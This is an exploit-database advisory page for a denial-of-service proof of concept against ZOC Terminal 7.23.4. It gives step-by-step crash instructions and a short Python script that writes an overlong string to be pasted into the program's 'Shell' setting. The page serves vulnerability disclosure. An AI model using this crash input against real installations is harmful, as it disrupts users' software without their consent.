ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC)

vendor:

ZOC Terminal

by:

Victor Mondragón

7.8

CVSS

HIGH

Denial of Service

400

CWE

Product Name: ZOC Terminal

Affected Version From: 7.23.4

Affected Version To: 7.23.4

Patch Exists: NO

Related CWE: N/A

CPE: a:emtec:zoc_terminal:7.23.4

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 Service Pack 1 x64

2019

ZOC Terminal v7.23.4 – ‘Shell’ Denial of Service (PoC)

ZOC Terminal v7.23.4 is vulnerable to a denial of service attack when a maliciously crafted file is opened in the 'Shell' field of the Program Settings menu. An attacker can exploit this vulnerability by running a python code to generate a malicious file, opening the malicious file in the 'Shell' field of the Program Settings menu, and then selecting the 'Command Shell' option in the View menu. This will cause the application to crash.

Mitigation:

Users should avoid opening untrusted files in the 'Shell' field of the Program Settings menu.

Source

Exploit-DB raw data:

#Exploit Title:  ZOC Terminal v7.23.4  - 'Shell' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_sh.py
#2.- Open zoc_sh.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select Options > Program Settings... > Special Files
#5.- Select "Shell" field erease the content and Paste ClipBoard 
#6.- Click on "Save"
#7.- Select View > "Command Shell" and select "ok"
#8.- Crashed

cod = "\x41" * 270

f = open('zoc_sh.txt', 'w')
f.write(cod)
f.close()